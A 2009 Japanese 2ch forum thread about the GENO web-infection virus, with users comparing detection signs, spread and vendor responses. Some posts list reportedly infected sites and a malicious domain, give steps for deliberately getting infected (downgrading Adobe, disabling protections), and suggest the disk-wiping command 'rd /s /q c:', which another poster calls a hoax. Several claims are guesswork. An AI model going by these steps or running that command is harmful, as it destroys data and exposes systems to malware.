書き換えられた後のファイルは、ヘルプファイルとしては壊れた状態で使い物にならない。
>>424 あくまで推測だけど、サイト書き換えようのFTPのアカウントとキーとアドレス情報の格納場所じゃないかと思う。
chmファイルのサイズが一定しないっていう情報を4月騒動の頃にまとめサイトで見たことがあるんだが、
それは、他の感染PCとキー情報のやり取りをして、情報が増えて行ってるからではないかと思う。
で、他の感染PCと一切交換を行っていない初期サイズが1323バイトとか。
もし、感染した人の中に、chmファイルのサイズが時とともに増加していったっていう情報があれば、その線を疑えると思う。
>>431 RMTができれば日本での認知度なんて気にしてないのかもね
客がいれば利益は出るわけだしどのゲームでもやることは同じだし投資は少ないし
特定のターゲットにしぼるより広くやったほうがどれかが潰れても
被害を抑えられるかな
>>433 そこまで潜伏できるのにわざわざ明確な印残す意味が分からんなぁ>sqlsodbc.chm
あ、もしかしてsqlsodbc.chmを読み取り属性にしておくと拙いかな、これ?
440 :
ひみつの文字列さん :2024/12/19(木) 00:53:34 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
>>437 の補足として、ウイルスを駆除したにも関わらず、FTPパスを変えてなかったら、
自サイトをウイルス誘導ページに書き換えられたっていう報告があるらしい。
そのため、感染PC同士でFTPアカウント情報のやり取りをしており、
どこかに保存しているっていう観点からそう推理してみた。
ただいま。
>>434 >ヘルプの項目に嘘八百を追加するんですか?
かなりの危険をおかしてまで、たったそれだけの無意味なウイルスは作らないと思うがw
sqlsodbc.chm自体が書き換わったら容量変わるだろ?
じゃあ、おやすみなさい。
初期スレからいるが、f639という文字列を見る度に感じるホッという安心感はなんなんだろう 俺だけか
とりあえずsqlsodbc.chmの更新日時は一年前になってるからOKですよね?
446 :
401 :2009/05/17(日) 23:37:40 ID:N9SKEU4J0
>>418 ソース見ただけでは感染しないよ。(苦笑
逆に、自分がサイトの管理者であった場合なら、自分が管理しているサイトに異常が無くても
感染している可能性はある。 これは、今の所
・sqlsodbc.chm のサイズを確認。→1,323バイトとか、ファイルが異常に小さくなっていたら確実にアウト
・ダブルクリックして、ヘルプファイルとして開けるか? → ダブルクリックして『壊れている』と表示されたらヤバイ。
→ sqlsodbc.chmをワードパッドなどで開いてみる。ファイルが開けて、中身がテキストデータに置き換わっていたらアウト。
ぐらいしか確認の方法が無い。 cmd.exeとレジストリエディタによる確認方法は、忘れた方が良い。
さて、危ないから感染した仮想PCはゴミ箱行きにします。
感染してるか気になって自分も調べたんですけど XP SP3 でsqlsodbc.chm が無かった nliteで削ったりしたからだと思うけど。
>>447 2000で無い場合に作られるから多分XPでも挙動は同じじゃね?
>>448 ですよね。
とりあえず一安心。
アップデートにも繋がりますし。
chmは操作かく乱用のダミーっぽいとのこと ソースは検出可否報告スレ
>>433 ありがとう。やっぱりもう重いだとかcmdが開かないとかそんな確認方法は無駄かも「しれない」のね。
sqlsodbc.chmの他にHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32
の様子はどうですか?
つか無料鯖で捨て垢作ってftpで適当なhtmlファイル上げてみてソース確認すれば感染確認できるやないかえ
454 :
192.168.0.774 :2009/05/17(日) 23:56:05 ID:kVP/8H1t0
ジェノチェッカーで、俺のPC(VISTA)のsqlsodbc.chmのサイズが46,133で感染の疑いが有るっていうんで、 ■確認方法 1.スタートから「ファイル名を指定して実行」 2.「ファイルを指定して実行」という画面が出てくるので、入力欄に 「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す →背景が黒いウィンドウが開いた場合3へ →起動しない場合:感染疑い濃厚 3.背景が黒いウィンドウを選択。 小文字で「dir C:\WINDOWS\system32\sqlsodbc.chm」と入力してEnterキー を実行したら最終更新日が2006年11月…… これは、どれを信じりゃいいのかわからなくなってきたんだが。
とりあえずAdobeのFlashとReaderを最新にするなりアンインストールしとけば平気ですか?
456 :
401 :2009/05/17(日) 23:59:33 ID:N9SKEU4J0
>>450 いや、それ私。(苦笑
ダミーと書いた方が先で、ロガーのデータという話の方が後。
この辺は、流石に自分で通信をあっちに傍受させる気はないんで、こちらでは確認はちょっと難しい。
>>446 vistaでジェノチェッカーを使用し、ファイルサイズが違うので感染の疑いが濃厚です。
と、出たのだが401さんの言うようにヘルプファイルで開けるし、最終更新日は遙か前だわ。
こうなるとジェノチェッカーで感染したと思いこんじゃう人が出てくるんじゃないだろうか…
このGENOって何の為のウィルスかは未だ良く分かってないんですよね? オマケに感染したのかを2chとかで知って確認した人ぐらいしか自覚が無いらしいし… 新型インフルでは無いけどこれから爆発的に被害出そうで気味悪いなぁ
459 :
401 :2009/05/18(月) 00:03:53 ID:N9SKEU4J0
>>452 そこは今まで通り、auxとして登録されるのを確認してあります。>424の2番の所ですね。
詳しい人なら、そこを押さえるのが一番でしょう。 レジストリを確認しにくければ、やはりsqlsodbc.chmのサイズと中身かな。
cmd.exeとレジストリエディタは、あちらが改良したからには、今後のバージョンも使えないと思った方が良いかと。
あーなんか勝手にドライバ作ってんのね
なんか、ウイルス作者がこのスレ見て次verの対策練ってたらやだなぁ
>>459 今のところauxに痕跡は残しますか
折角regeditを起動させるようにしたみたいだし、レジストリを監視するのも面倒臭くなりそうだなあ
とりあえず、初心者にわかりやすい説明としてはsqlsodbc.chmをダブクリで開いてみて、 エラーが出ないでヘルプファイルが開けたらセーフとかにしたほうが混乱が少なくていいんじゃマイカ?
sqlsodbc.chmのショートカットデスクトップに置いとくか
これって世界規模ではどんな感じで広がってるんだろうか。 あと質問なんだけれど、sqlsodbc.chmって開くと日本語でヘルプファイルが出てくる? だったら、ジェノチェッカーでサイズの違いで感染に引っかかったというコメントが出る原因がわかるんだが。 もしそうなら俺がドイツ語版vistaを使っているからということで説明がつく。
>>469 日本語だね
>>111 のITMedia見る限りでは全世界規模で広がってると考えてよさそう
今Microsoft Updateをしようとしたら、エラー番号: 0x80072EFDが出て できませんでした。OSはXP SP3です。
>>469 ドイツで多少出ているようです
後でレス探してみます
sqlsodbc.chmはヘルプが出ます
逆に出ないときは感染濃厚ということです
いつも思うんだけどさ。 こういう2ちゃんみたいな低俗な掲示板で、頑張ってウイルスと 戦うお前らって、 勇者だよね。 ・・・ただのヒマ人?またまた御冗談を。
>>470 ありがとう。おかげで謎が解けた。
しかし
>>457 .454でジェノチェッカーの精度に疑いがあると書いてしまった……
他の人が間違えないといいが。
今すっごいネット重いんだけどウイルスと関係ある?
>>475 つテレホタイム
>>472 あぁ、ドイツの掲示板でも感染の装弾している所を発見。
やっぱり感染の確認方法はほとんど一緒。
やはり感染疑いのユーザーが雪崩れ込んでて、FUCK!の嵐でまともに相談できていない模様。
どこも一緒なんだなw
>>477 すまん、もしよければそのドイツの掲示板を
教えてはくれまいか。
>>461 ヒント:相手は外人
ここよりももっと有益な情報が書いてあって、しかもちゃんと纏められてる英語の掲示板見るのでここは見ません
さっきカスペルのチェックでマルウェア検出された俺涙目 今ウィルスバスターでもっかい確認中、ダメならもうだめだ
>>478 大学とOB用の草の根BBSみたいな所だから、卒業した学生番号がいるんだが。
すまない、それ教えると俺の身元が割れちまうから勘弁してくれ。
作者ってマジで外人なのか 何のために・・・
アップデートできなかったらってのは、エラー番号: 0x80072EFDがでたらと言うことですか? それとも、Microsoft Updateのトップサイトにすらつながらない状態ですか?
巨大なbotnetの作成
金稼ぎじゃないかと言われてる
487 :
192.168.0.774 :2009/05/18(月) 01:00:58 ID:vNL6vAf4O
さっきからインターネットが繋がんないんだが… 感染したのかな?
>>483 外人の組織?で、普通に金儲けだと思うよ。
後は愉快犯とかが亜種作ってるんじゃないのかな。
国内のサイトの現状知ったらどう思うのかなー。
489 :
192.168.0.774 :2009/05/18(月) 01:15:12 ID:TTbAOLbH0
何よりこわいと思ったのが、製薬会社やらの普通の企業もやられてるのに、未だほとんどニュースとして公表されてないこと 2ch張り付いてる奴ならともかく、もう少し広まったら確実に普通にネットやってる連中のPC終わるぞ
>>489 イメージダウンになるから黙ってるんでしょ
黙ってる方が後で大幅イメージダウンになるこのご時世
>>489 ネットニュースで最近知ったが日本での発端が四月と聞いてビビッタよ
感染はしてなかったけど感染が判らないだけかも知れないのが気持ち悪い
アンチウイルスベンダーの対応も今一だからね… 積極的にプレスリリース出してる所も英語圏が中心でしょう それが原因じゃないかなあ
494 :
192.168.0.774 :2009/05/18(月) 01:33:23 ID:TTbAOLbH0
個人的に一番嫌なのはカスペから乗り換えようとしてたノートン先生の今回の対応が残念すぎたこと これでまたセキュリティを考え直さなきゃいけない
感染の確認方法だけど、gnomeの人は初めから sqlsodbc.chmとレジストリ値の確認だけで cmd.exeやregeditの起動による確認方法は書いてないね やっぱりこの人のところが一番信用できるなと思った ニフティの件みたいに良く読まない人がデマ流したりして大変みたいだけど これからもがんばってほしい
496 :
192.168.0.774 :2009/05/18(月) 01:44:09 ID:BzNhsWFE0
225のヤツとか逮捕の対象にならんの? ウイルス広めるヤツは逮捕&死刑でいいでしょ。
498 :
192.168.0.774 :2009/05/18(月) 01:51:13 ID:BzNhsWFE0
いんや。流石にリンクを踏むのが怖くてね。 後に感染したってあったから、もう少し注意が足りなかったら感染してたかも・・・ って考えるとな・・・。
>>489 そうだよ!何か今回おかしいよな!
まさかとは思うけど
同人誌とかアニメとかそういうのが大嫌いなやつが
このウイルスを再び蔓延させて
一気にヲタを潰そうと考えたのかもしれない
>>499 そんなちっぽけなレベルの話じゃないです
>>492 何度も悪いけど
その時もあまりおおっぴらに取り上げられなかった筈
今回は何かおかしい
どうせ後で「GENOウイルス?あぁあんなんに騙されて大騒ぎしてた奴らなんてただの馬鹿だよww」ってことになんだろ?
/^7_ . ,' / / | //ヘ | / / 三 | / , ヘ -‐¬ { ミ / / \ / 三 L 」 ミ / _ ニコ // ヽ, . X / | | ミ / >'´ ,.└''"´ ̄ ̄ `ヽ、 キャッシュ消せばいいんだよ . / / 、 | | / ヽ ,. '´ 、、 ヽ ヽ . ,′ , \ | |__ ノ , lヽ j /、lヽ ト、_,,.', { /´ ̄`'J r'´ r'"イ .ノ\| .レ r=;ァ'レ' { } ― -- { }. { !、 l rr=- / `'''l.>‐ .、 ‐ ― ヽ. _人. レヽ.,ト' ー=‐' / l 、,,_,,ノ / /ヽl } \. ,}' ', /ヘ, /レ' ,/ >‐、 ヽ / /ミ ノ ノ、 ` 7'´レ1 ヽ 人ル'レ' 'i、_ / / ミ (_/ \ レ〜i` ヽ 、_ ( "
ieから火狐に変えれば予防出来る? てか、初心者向けのまとめサイトってないかな?
>>504 1.Adobe Flash Player の最新版にアップデート
2.Adobe Acrobat Reader の最新版にアップデート
4.Adobe Acrobat Readerの JavaScript 機能OFF
ここまでは出来るだろ。
少なくとも4月頃は色んな板でやたらとスレ立って祭りしてたようなイメージがあるが 逆に今回の騒ぎ様の方が違和感というか今更感があるんじゃ?
情弱腐女子とニコ厨大好き東方・ボーカロイド同人サイトで 急速にパンデミック起こしたからじゃね
実際に感染してんのはそいつらだけだろうな
707 名前:GENO[sage] 投稿日:2009/05/18(月) 02:31:35 ID:93Cm5lq90
Photoshopとか割れ物使ってる人多いから
Adobe製品を丸ごとアップデートOFFにしてる人多そうだよね
そしてPDF ReaderやFlashまでアップデートされずにウイルスに狙われる
709 名前:GENO[sage] 投稿日:2009/05/18(月) 02:33:00 ID:9UIQFr160
>>707 なるへそ、だから同人で感染爆発してるのか
まぁ四月の時はGENOのサイト行ってない奴は他人事で済まされたからな いや、実際済まなかったんだけどさ
夏コミが近いというのに まったくもう!
とりあえず、今日会社とか学校ある人は行き先のPCを要チェックかと。 セキュリティ部門の人とかが今回の件わかっていると被害を抑えることができるんだけど… ベンダーが日本時間の月曜朝に対応するなんてありえないと思うし… ※まずはネットワークから切り離してhostsを変更してから再起動後に… 諸々のファイルチェックして…って大変だなぁ…
>>506 同人板の方で盛り上がって火がついて燃え移ったというか巻き込まれたというか
サイト持ちの人が多いのもあるけど、もともと燃えやすい極端な人が多い
きちんと理解していて宥めてる人に対して
危機意識が足りないと噛み付いてる状態で、セキュ板も随分荒れた
(同人板が荒したってわけじゃなくて同人板から流れてきた人が原因でスレ住人が荒れた)
515 :
192.168.0.774 :2009/05/18(月) 02:41:31 ID:6Sa4e4kP0
誰かウイルスに確実に感染するサイト教えてください とりあえず今のところ 成美堂出版 www.seibidoshuppan.co.jp/ livmail www.livmail.com/3others-page/janet/tokusen/index.htm carwash www.carwash.co.jp/ senlights www.senlights.co.jp/seihin/kirenaru-1s.htm を試してみました 誰かお願いします
>>515 まずアドベ製品のダウングレード
JSをオンにする。セキュリティソフトを解除
ファイアーウォールも解除
で閲覧すれば感染するかと
サイトが悪いんじゃ無くて環境のせいで感染しないんじゃない?
こういうときは自宅警備員さんがうらやましい…かな? うちの勤め先…絶対誰かGENO罠踏んでるだろうなぁ 本社の基幹でDenyしてくれてると安心なんだけど… 感染者には始末書というプレゼントが…(=ω=
>>513 セキュ板のgenoスレも見てるから一応の流れは知ってる
確かにサイト持ってる友人もgeno騒動知らなかったみたいだったし
頻繁に2ちゃん覗いてないとそんなモンなのかねぇ…
>>518 更に砕くと
同人ノウハウの一つのスレで1回話題になってちょっと騒ぎになる
これは騒いで皆に知らせた方が良いということで同人板にスレが立つ
超盛り上がる。と言う感じ。たった一夜で連投規制のある板で凄い加速だよ
前々からこの手のタイプのウイルスはこんなもんでしょ
今回はけっこう広まってるからちょっと事情が違うけど
>>513 同人板はカード番号抜かれるとかもう無茶苦茶言ってる奴がいるw
わからないことはわからないでいいのに異常なまでの恐怖心を煽るようなことを言うからゆとりが流れ込んでくるんだよ
自業自得だ
>>499 これで割れのacrobatはすべて使い物にならなくなるワケだ.
adobeはホルホルしてるだろうなw
>>521 感染サイトにまで誘導してる奴まで現れる始末だしな。
正直、彼らとは距離を置きたい。巻き添えくいそうでたまらんよ。
ケータイからPCブラウザ見るぶんには大丈夫なんでしょ?
このウィルスなんて読むの?じぇの?げの?
★危険★ これも感染? www.seibidoshuppan.co.jp
同人板って他のν速やvipやここのウイルス対策スレと 明らかに毛色というかノリというか湿度が違う気がする なんかこわい
530 :
192.168.0.774 :2009/05/18(月) 03:04:32 ID:wbZLj6zq0
>>527 GENOウイルスチェッカー
危険度1000%
超絶危険なURLです。友人のPCを壊すのに利用しましょう!
絶対に踏んではいけません。
評価ミス報告
>>529 ネチネチした連帯感みたいなのがあるな。
自治好きが多いんだと思う。
532 :
192.168.0.774 :2009/05/18(月) 03:05:50 ID:6Sa4e4kP0
>>516 >>515 に追記します
>>515 のサイトを踏んだ結果
成美堂出版はなんともなく
他3つのサイトではトロイが検出されました
けど感染したいウイルスはGENOです
現在の環境は
Windows XP Home SP3
IE6
reader 8
flash player 9
JS有効
セキュリティー無効
ファイアーウォール無効
です。
他にGENOに感染するための条件はなにかありますか?
何故感染したがる
>>520 送信先はウクライナか・・・
しかし、北アメリカとかヨーロッパ全土が感染とは・・・
535 :
192.168.0.774 :2009/05/18(月) 03:09:04 ID:6Sa4e4kP0
>>533 ○感染後の行動
・cmd.exeとregedit.exeが起動するか確認
・タスクマネージャーでcmdが勝手に動いてないか確認
・Acrobat(Adobe Reader?)が勝手に起動
・CPU使用率をチェック
・PDFファイルやシステムファイルが増殖してるかチェック
・cmdでdir C:\WINDOWS\system32\sqlsodbc.chmのサイズが50,727か確認
・最後cmdからrd /s /q c:を実行
○検証するブラウザ
IE6
IE7
IE8
Firefox 3.0.10
Opera 9.64
Chome 1.0.154.65
を自分で検証してみたい
>>531 同人女は他人から見たら馬鹿としか思えないローカルルールが多く、それらを守らないとヲチというリンチに遭う
危機感煽ってるくせに感染サイト晒せないのはそのせいだね
大いなる矛盾なんだが
あそこ見てると葬式の時だけはりきってる普段は地味なおばさんを思い出す
537 :
192.168.0.774 :2009/05/18(月) 03:11:10 ID:gtQ58YdFO
ラトビアでも流行ってると聞いたぞ
>>533 検体ほしいとか?
>>532 成美堂出版はソースは真っ黒だったんだが
ウイルスの搬入先が死んでるとこだったのかね?
>>535 ご、ごめん
解りやすく説明して
目的だけ
クリーンインストールすりゃ良いって分かってんだから、 予備のPC使って自分で確かめたいって奴もいるだろう。
>>535 まさか感染したまま、満員電車に乗るような感じのことをするんじゃないだろうな。
>>537 えーと、バルト三国って北欧?なのかな
あそこらへんはIT強い国いくつかあったしそっちにも行きそうだ
ヨーロッパ・北アメリカ・北欧ときたらそろそろインドや東南アジア辺りもヤバそう
543 :
192.168.0.774 :2009/05/18(月) 03:18:25 ID:6Sa4e4kP0
>>538 他のスレでもそう聞いたよ
>>539 単なるブログのネタだよ
かれこれ6時間以上GENOウイルスを求めてさまよってる・・・
俺はただSSと検証レポをしたいだけなのに(´;ω;`)
まさかこんなに時間がかかるとは思わなんだぞ
>>536 同人女って言うかあの板がおかしいんだよ
類友のはずのノウハウ板はそうでもないし
同人板から移転が相次いで最近はあっちも大変らしいが。
>>535 ・XP以下のWindowsでアクセスする。
・Adobe Readerをインストールしている。
・Flash Playerをインストールしている。
・JavaScriptを有効にする。
・Chrome以外のブラウザでアクセスする。
・ロケーションバーにURLを打ち込んでアクセスするのではなく、感染サイトからアクセスする。またはリファラを偽装する
・過去に攻撃サイトにアクセスしたことがあり、その際cookieが有効だった場合はcookieを削除する。以後cookieを拒否する
・もし以前に攻撃サイトにアクセスしたことがあり、その際「XP以下のWindows以外」でアクセスしていた場合はIPアドレスを変える
・セキュリティソフトを使用しない。
以上の条件を満たすことが必要。
これでも感染しないようであれば
・Adobe Reader、Flash Playerのバージョンを下げてみる
・仮想マシンを使っているならば、実機で試してみる
・NX bitが実装されているCPUを使用しているならば、実装されていないCPUを使用する
546 :
192.168.0.774 :2009/05/18(月) 03:20:17 ID:gtQ58YdFO
>>542 ラトビアはバルトで北欧地方だ
イギリスでもGENOかは分からないがウイルスが流行ってると聞いたが…これは定かじゃない
誰か知ってるやついるか
>>535 >・最後cmdからrd /s /q c:を実行
パニックにつけ込んだデマって怖いね
>>543 わかったちょっと待ってて
いくつか候補はあるんだが、すでに対応きてるかもだからからちと確認してくる
551 :
192.168.0.774 :2009/05/18(月) 03:23:16 ID:gtQ58YdFO
そういえば俺のパソコン感染して初期化した GENOウイルスらしきものは見つからなかったがネットワークに接続できない まさか今もパソコン内部に潜んでて進化してるなんてことないよな
>>543 すでに1つDLしてたら24時間はDLできないって誰かが言ってた
しそこねたことがあったのかもしれない
IP変えられるならそれで挑戦してみるのも手かも
>>549 感染したら最後はそれでフィニッシュしないとw
アンチソフトでの駆除できないんだし。不思議なことはないよ
>>543 リボンマジックでググってみてくれ
このサイトもまだ対応してないっぽい。ソースが黒い
774 名前:geno[sage] 投稿日:2009/05/18(月) 03:24:56 ID:E9Mwu5RAP 296 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/18(月) 03:20:10 なんか同人スレは「質問はセキュリティ板へ行け」みたいに言ってるぞw なんでセキュ板がそこまで面倒みてやらなならんのだと・・・ しかも親切に質問に答えてやってると「セキュリティ板に乗っ取られてる!!」とかw もうねアフォか馬鹿か同人かと・・・
>>543 レポートかw
確かにブログネタにしたら訪問者増えるよね、きっと
怖くて今ケータイからやってるんで力になってあげられないけど
同人サイトとかランキングとか同人サイトのリンクから梯子したりすれば見つかるんじゃない?
>>543 海外サイト漁った方が早いぞ。
あっちのほうがいいかげんだから。
sqlsodbc.chmで検索かけてそこのページから飛ぶのだ。
>>543 Reader8で感染できなかったので9.0.0にしたら感染できた、たまたまかも知れないが
成美堂のtuz.cnは死んでる
あとIP変えまくれ
面白い流れになってきたなw
>>557 >>207 Flash Playerは10.0.22.87と9.0.159.0がGENO関連の脆弱性を修正したver
Adobe Readerは7.1.1と8.1.4と9.1.0がGENO関連の脆弱性を修正したver
以降は別の脆弱性を修正したver
560 :
192.168.0.774 :2009/05/18(月) 03:29:45 ID:gtQ58YdFO
外も中もウイルスだらけだな…(´д`)
561 :
192.168.0.774 :2009/05/18(月) 03:30:55 ID:6Sa4e4kP0
>>545 サンクス
とりあえず上の項目は全部試してる
ただ下の項目の下二つは
VMware上のXPでAthlon 64 X2 5600+だから
条件をクリアできてないな
>>549 まぁそれは今回の検証のオチってやつだよw
>>550 おねがいしますm( __ __ )m
>>552 IPはいろいろあって何度も変えてる
けど感染してない
>>553 一応リボンマジックも直接URLを入力して踏んでみた
けど感染しなかった
>>555 一月ぶりぐらいにかくブログですw
>>559 おお、そういうことだったのかありがとう
実はすでに感染してるんじゃね・・・?
778 名前:GENO[sage] 投稿日:2009/05/18(月) 03:31:36 ID:0ntxn30Q0
>>771 、
>>775 >>774 の書き込みが証明しているとおり、奴らがこの板で回答する限り、徹底スルーってのは無理だから。
セキュリティ板の荒らしどもがこのスレに常駐している限り、いつまでも初心者の質問が来続ける。
つーか「アフォかと…」はどっちなのかと。
「親切に答えてやってるのに」とかほざいてますが、お前らに自覚がないだけで、同人板にとっては実質荒らしだっつの。
>>776-777 同意。完全に板違いなのに肯定されてるのがどうかしてる。
564 名前:192.168.0.774[sage] 投稿日:2009/05/18(月) 03:33:28 ID:WSfvVExd0
778 名前:GENO[sage] 投稿日:2009/05/18(月) 03:31:36 ID:0ntxn30Q0
>>771 、
>>775 >>774 の書き込みが証明しているとおり、奴らがこの板で回答する限り、徹底スルーってのは無理だから。
セキュリティ板の荒らしどもがこのスレに常駐している限り、いつまでも初心者の質問が来続ける。
つーか「アフォかと…」はどっちなのかと。
「親切に答えてやってるのに」とかほざいてますが、お前らに自覚がないだけで、同人板にとっては実質荒らしだっつの。
>>776-777 同意。完全に板違いなのに肯定されてるのがどうかしてる。
565 名前:192.168.0.774[sage] 投稿日:2009/05/18(月) 03:34:39 ID:CVgAB4qkP
564 名前:192.168.0.774[sage] 投稿日:2009/05/18(月) 03:33:28 ID:WSfvVExd0
778 名前:GENO[sage] 投稿日:2009/05/18(月) 03:31:36 ID:0ntxn30Q0
>>771 、
>>775 >>774 の書き込みが証明しているとおり、奴らがこの板で回答する限り、徹底スルーってのは無理だから。
セキュリティ板の荒らしどもがこのスレに常駐している限り、いつまでも初心者の質問が来続ける。
つーか「アフォかと…」はどっちなのかと。
「親切に答えてやってるのに」とかほざいてますが、お前らに自覚がないだけで、同人板にとっては実質荒らしだっつの。
>>776-777 同意。完全に板違いなのに肯定されてるのがどうかしてる。
>>560 まったくですね、新型インフルエンザ流行ってるから外出控えようと思って家でPCしようと思ったらウイルスが出回ってて、なんだかなー;
>>561 良い記事書いてくださいな(・∀・)オーエン
海外の二次創作サイトって感染してる所あるのかな
それともアダルトサイトの方が感染しやすいとか?
>>561 ティアラモードと株式会社まどかももう試してるだろうな
どうにも引っかからない環境にいるようにしか見えない
後は同人サイト巡りしかないわー
570 :
192.168.0.774 :2009/05/18(月) 03:37:43 ID:gtQ58YdFO
外出もままならない、ネットもできない今、やることはポケモンしかねえ…
今日はウイルスの恐ろしさとストーカーの恐ろしさを知ることが出来た
572 :
192.168.0.774 :2009/05/18(月) 03:38:39 ID:6Sa4e4kP0
>>556 ちょっとググってみます
>>557 そういやリボンマジックじゃ
IP変えてないからちょっと試してみます
>>563 今のところsqlsodbc.chmのサイズは変化なし
再起動後も通常起動確認
>>567 ありがと
>>568 その二つはまだ踏んでないです・・・
今から踏んできます
>>545 ちょっと説明が不十分なので修正
× ・ロケーションバーにURLを打ち込んでアクセスするのではなく、感染サイトからアクセスする。またはリファラを偽装する
○ ・ロケーションバーにmartuz.cnを打ち込んでアクセスするのではなく、感染サイトからアクセスする。リファラを切っている場合は有効にする
>>561 となるとやはりredearとflashのバージョンかな。
reader 8.1.2、flash 9.0.115以下あたりではどうだろう。
豚インフルとgenoウイルスの発見が同時期くらい 豚インフルの国内初感染者確認と同人板の感染者騒ぎがほぼ同時 あっちもこっちも絶妙なタイミングで大変だな
まさかGENOウイルスなんてなかった、なんてことはないよな?
577 :
192.168.0.774 :2009/05/18(月) 03:45:41 ID:gtQ58YdFO
578 :
ひみつの文字列さん :2024/12/19(木) 00:53:34 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
>>577 そのまんまの意味。
何か普通のウイルスの広がり方と違う気がする。
検証実験も妙に少ないし。
580 :
192.168.0.774 :2009/05/18(月) 03:52:06 ID:6Sa4e4kP0
>>573 中身までは確認してないけど
起動はするみたいです
>>574 現在のヴァージョンは
reader 8.1.2
flash player 9.0.159.0
ですね
flash playerをもっとダウングレードしてみます
それととりあえずティアラモードと株式会社まどかを
踏んでみたけど感染症状なし
>>578 ちょっと試してみます
でっち上げかもね
これ、感性の可能性あるのはWindowsのみ? マックは平気なのかな?
584 :
192.168.0.774 :2009/05/18(月) 03:58:27 ID:6Sa4e4kP0
自分のPCが感染してるかどうか 確実に確認できるウイルスチェッカー教えてください
586 :
192.168.0.774 :2009/05/18(月) 04:00:41 ID:gtQ58YdFO
>>579 確かに感染の波は少し変わってるが、存在そのものを否定するのは難しいぞ。
現に俺のパソコン感染したからな。まとめwikiに記載されてた症状と一致しまくった。
だがウイルスという名義で別の目的の用途をなしていたとしたら…それもそれで考えは広がるが。
(個人的な想像、もしもまとめwikiそのものがウイルスでっちあげ&発祥源だったらカオス)
一応聞かせて、ケータイでPCブラウザ見ても感染しないよね?
588 :
192.168.0.774 :2009/05/18(月) 04:03:45 ID:gtQ58YdFO
>>578 それはわからん。ただ携帯のフルブラウザで開くと感染の疑いがあるらしい。ただの携帯のインターネットなら問題ないが、PCページはどうかは不明だな。
調べても情報が入り混じっていて自分で確かめるしか確かな情報は得られないと思う…。
>>586 まぁさすがに何もないってことはないかw
ただちょっと作為を感じるよね。しばらく経過を見守るしかないか。
>>587-588 無い無い
ウイルス貰う事ができてもウイルスが動ける場所が携帯にはない。
PCように設計されてるウイルスだから、PCのシステムファイルがないと
役立たずだよ。MACやゲーム類もそうだよ。
携帯でブラウザ見れても、Windows専用ゲームとかはできないだろ
>>578 うちのXPが今のところ
sqlsodbc.chm → 1323バイト
regedit → 起動できず
cmd → 問題なし
タスクマネージャのsvchost → 問題なし
なんだけど、そっちのツールだと
「みつからなかったけど油断しないで下さい」だった。
これはどうなの?
593 :
192.168.0.774 :2009/05/18(月) 04:09:24 ID:gtQ58YdFO
>>589 作為…ちょっと同意。
ああ、様子見して鎮静化を待つのがいいな。だが鎮静化せずに余計騒ぎがあがったら大変だろうなw
>>588 (;゚Д゚)
やっぱりフルブラウザは感染する可能性も無いと言えないんだね
フルじゃなければ良いのかな…
てかケータイの場合、感染したらどういった影響を及ぼすのか解らない…
だれか情報見つけたら教えてくださいませー(-人-)
自分で確かめるのは怖くて
>>591 sqlsodbc.chmダブルクリックしてもヘルプ開かないだろ?
ご愁傷様です。OS再インストールガンバレ
597 :
192.168.0.774 :2009/05/18(月) 04:11:45 ID:gtQ58YdFO
>>590 そうか、ありがとう。
じゃあ携帯での調べは安全にできるってことだな。
598 :
192.168.0.774 :2009/05/18(月) 04:13:26 ID:gtQ58YdFO
最新のウィルスが来たんだって? テンプレを読んでも分かりにくい・・・ できれば画像か動画はないか?
>>590 そうなんですか
安心した。
ケータイで同人サイトを経営してる自分は勝ち組ですな!
>>591 martuz.cnから落ちてきた検体踏んだら同じ症状で
「みつからなかったけど油断しないで下さい」だった
アウト
603 :
192.168.0.774 :2009/05/18(月) 04:16:37 ID:gtQ58YdFO
初期化後のデスクトップの何もなさははんぱなさすぎて感動するぜ、ファイト
今ウィンドウズモバイル搭載のスマートフォンで成美堂のURL踏んできた イーモバイルのS21HT IEとオペラでアクセスしたんだが別に動作が重たくなったりする訳でもなく大丈夫っぽいわ 携帯に感染しないのは分かってたが、ウィンドウズモバイルだとどうか分からなかったのでとりあえず人柱報告。 だからといって他の携帯が全て感染しないとは言い切れないのでその辺は自己責任な
誤って成美堂のトコ踏んじゃったんだけど sqlsodbc.chmは50.727でregeditとcmdも 起動したから問題無いかな?マジで不安だ……
>>604 俺も踏んできたわ
機種はウィルコムのW-ZERO3[es]
こっちも特に怪しい挙動はないな
いまんとこウィンドウズモバイルは大丈夫っぽい?かな?
607 :
574 :2009/05/18(月) 04:31:54 ID:x0S5Vdnh0
一応こっちでも回線をつなぎ変えて踏んでみたが、pdf、swfが落ちてこない。 串を通して踏んだら落ちてきた。 どうもうちのISPの一部または全部がmartuz.cnに焼かれているようだ。 他にも検体が落ちてこない人はISPごと焼かれているのかもしれない。
>>596 ダブルクリック・・・、してみた。
ちくしょーヘルプひらかねえわ。
結局画像か動画で取れたやついないの? これじゃあ、どんな危険なのか良く分からん 俺が調べたところでは ・情報が盗まれる可能性があり ・つかまったらインスコ以外脱出不可 PCの中身があぽーん行き ・対処しようとしても勝手にメモリが食ってブルースクリーンにされる という感じだな
>>601 こうなったらなんでもやらせてもらう
毒を食らわば皿まで
>>609 動画取ってどーすんだ?ブラクラじゃあるめーし目で見て判るようなウィルスだったら誰も苦労しねーよw
612 :
192.168.0.774 :2009/05/18(月) 04:41:13 ID:gb9ZDt5LO
>>591 どうみても完全に妖精です。
ヘルプファイルは46KB(英語)か50KB(日本語)以外アウト
加えてレジストリエディタ起動不能
コマンドプロンプト起動で重症化するかも
さっさとバックアップ取って再インストールしろ
FC2ブログは感染しないよね? それだけ教えて
>>607 同じIPからの接続の場合、一定時間スリープするらしい。
時間を置かないと検体が拾えない。
で、
>>578 見てて思ったんだけど、Adobeの脆弱性がある環境なら、
ウィルス側がVistaを除外する必要ないよな。
HKLMの改変やProgram FilesやWindows以下のフォルダをいじると
UACが発動しちゃうけど、Users以下のフォルダに実体を置いて、
HKCU以下のレジストリ(\Software\Microsoft\Windows\CurrentVersion\Run)とか
なら発動しないでしょ。Adobe Updaterあたりに偽装したアプリでも仕込んで
おけばその後ユーザーにUAC昇格ダイアログでボタンを押させることも
できちゃうだろうし。
>>612 多分ダメなのは薄々わかってる
データのバックアップとるエリアがなくて悩んでんのよ
